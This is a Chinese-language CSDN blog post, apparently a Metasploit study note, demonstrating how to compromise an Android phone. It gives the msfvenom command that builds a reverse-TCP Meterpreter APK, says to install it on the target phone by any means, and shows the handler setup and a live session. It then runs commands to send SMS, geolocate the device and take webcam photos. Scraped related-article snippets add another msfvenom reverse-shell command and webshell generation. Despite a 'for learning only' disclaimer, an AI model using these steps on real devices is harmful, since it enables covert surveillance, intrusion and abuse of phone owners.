使用Metasploit对Andorid系统渗透测试提权——定位拍照发短信

最新推荐文章于 2024-07-18 10:31:51 发布
最新推荐文章于 2024-07-18 10:31:51 发布
阅读量2.1k 收藏 12
点赞数 2
分类专栏: 精通Metasploit学习笔记 文章标签: android metasploit 渗透测试 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/116745854
版权

文章目录

前言

使用metasploit对安卓系统渗透测试提权

一、生成攻击载荷

┌──(root💀kali)-[~]
└─# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.113 lport=6666 R> pay2.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10187 bytes

将生成的攻击载荷文件安装到目标手机内(无论用任何方法)
安装
打开

二、加载主控端handler

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.113:6666 
[*] Sending stage (77002 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.113:6666 -> 192.168.1.105:41207) at 2021-05-13 13:06:59 +0800

meterpreter > ls
Listing: /data/user/0/com.metasploit.stage/files
================================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40776/rwxrwxrw-  4096  dir   2021-05-13 13:07:01 +0800  oat

meterpreter > ifconfig

Interface  1
============
Name         : dummy0 - dummy0
Hardware MAC : ea:f1:0a:6f:b6:33
MTU          : 1500
IPv6 Address : fe80::e8f1:aff:fe6f:b638
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  2
============
Name         : r_rmnet_data2 - r_rmnet_data2
Hardware MAC : 00:00:00:00:00:00
MTU          : 1500


Interface  3
============
Name         : r_rmnet_data3 - r_rmnet_data3
Hardware MAC : 00:00:00:00:00:00
MTU          : 1500


Interface  4
============
Name         : r_rmnet_data0 - r_rmnet_data0
Hardware MAC : 00:00:00:00:00:00
MTU          : 1500


Interface  5
============
Name         : lo - lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
....
meterpreter >

成功获取目标手机meterpreter权限,可以进一步的监视手机使用情况,这里介绍以下几个:

meterpreter > help

①检查是否root

meterpreter > check_root
[*] Device is not rooted

②向任意号码发送短信(测试机无手机卡)

meterpreter > send_sms -d 18211111111 -t "hello"
[-] Error running command send_sms: Rex::TimeoutError Operation timed out.

③查看手机信息

meterpreter > sysinfo
Computer    : localhost
OS          : Android 9 - Linux 4.4.153-perf-ged862bb (aarch64)
Meterpreter : dalvik/android
meterpreter >

④手机定位

meterpreter > wlan_geolocate

⑤拍摄照片

meterpreter > webcam_snap

总结

本文简单介绍了使用metasploit对安卓手机渗透测试提权,仅供学习

我重来不说话
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
手机网络抓包 4g网络分析
12-01
手机网络抓包工具,可以抓取手机网络包括4g 3g 2g 网络数据,可用于监控, 协议分析
提权metasploit提权方法
孤桜懶契
08-22 834
前言 metasploit 提权使用 常用的提权模块 metasploit 提权EXP存储文件夹路径 find / -name metasploit 一般都在 /usr/share/metasploit-framework/modules/exploits/windows/local windows2003提权 环境:2003 server 1、生成攻击载荷 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lpo
Metasploit 完全指南(四)
最新发布
龙哥盟
07-18 913
本章介绍了一种实用的基于客户端的利用方法。学习基于客户端的利用将使渗透测试人员更容易进行内部审计,或者在内部攻击比外部攻击更具影响力的情况下进行操作。在本章中,我们研究了各种技术,可以帮助我们攻击基于客户端的系统。我们研究了基于浏览器的利用及其变种。我们利用 Arduino 攻击了基于 Windows 的系统。我们学习了如何创建各种基于文件格式的利用,以及如何使用 Metasploit 进行 DNS 欺骗攻击。最后,我们还学习了如何利用 Android 设备。
msfvenom
ss810540895的博客
04-20 2833
使用最新版msf时 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.70.19 LPORT 4444 -f elf > backdoor.elf 报错如下 [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payl...
android系统同时使用wifi和4g上网
蛰伏--当你不够强大时,就不要放弃努力
12-08 7595
需求:通过4g访问外网,同时通过wifi访问内网。  android系统默认情况下,wifi连网时,4g数据链接会被强制断开,但实际有需要wifi和4g同时上网,为了满足这个要求,需要修改android的网络管理机制。  首先实现wifi连网时,不让4g数据链接被强制断开:  修改  frameworks/base/services/core/java/com/android/server/ConnectivityService.java private void teardownUnneededNetwo
说说策略路由
seaicelin的博客
01-06 7783
前阵子问一个老同事,我说你觉得android数据网络管理这部分知识点的核心是什么? 他说:apn管理,网络评分机制,这些是最基础最简单的,我认为的核心应该是策略路由。
tcpdump命令使用
xcw1234的博客
02-03 659
tcpdump命令使用 1、抓取网卡rmnet_data1,端口80, IP10.29.31.92 发送的数据 tcpdump -i rmnet_data1 -nnA 'port 80 and src host 10.140.15.20' 2、指定ip,例如截获所有210.27.48.1 的主机收到的和发出的所有的数据包 tcpdump host 210.27.48.1 3、截获主机hostname发送的所有数据 tcpdump -i eth0 src host hostname tcpdump -.
metasploit使用lnk漏洞渗透测试.doc
03-18
Metasploit使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版》是一本深度探讨Metasploit框架的权威书籍,旨在帮助初学者和专业人士理解并掌握网络安全领域的渗透测试技术。Metasploit是一款强大的开源安全工具,广泛应用于安全评估、漏洞验证...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。   下面是具体的利用方法。   我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:   产生webshell   msfpayload windows/meterpret
关于Metasploit Framework与渗透测试相关知识
12-28
使用Metasploit进行渗透测试时,必须遵守道德和法律规定,只在授权的情况下对目标系统进行测试,并确保测试不会对生产环境造成破坏。 总结,Metasploit Framework是渗透测试者的重要武器,它的强大功能和灵活扩展...
Metasploit渗透测试指南完整版-pdf
07-23
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被...
Metasploit渗透测试指南(全) .pdf
12-23
Metasploit渗透测试指南》是一本全面介绍Metasploit框架的权威书籍,它涵盖了从基础知识到高级技术的广泛内容,旨在帮助读者理解和掌握渗透测试的精髓。Metasploit是一款强大的安全工具,广泛用于安全研究、漏洞...
使用MetasploitAndroid端进行渗透测试
weixin_64647213的博客
02-10 1514
记一次对于android的安全测试,细节更多,适合小白
App性能测试之流量监控
qq_492448446的博客
07-12 1486
App性能测试之流量监控
利用MSF提权
m0_65554829的博客
11-14 366
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值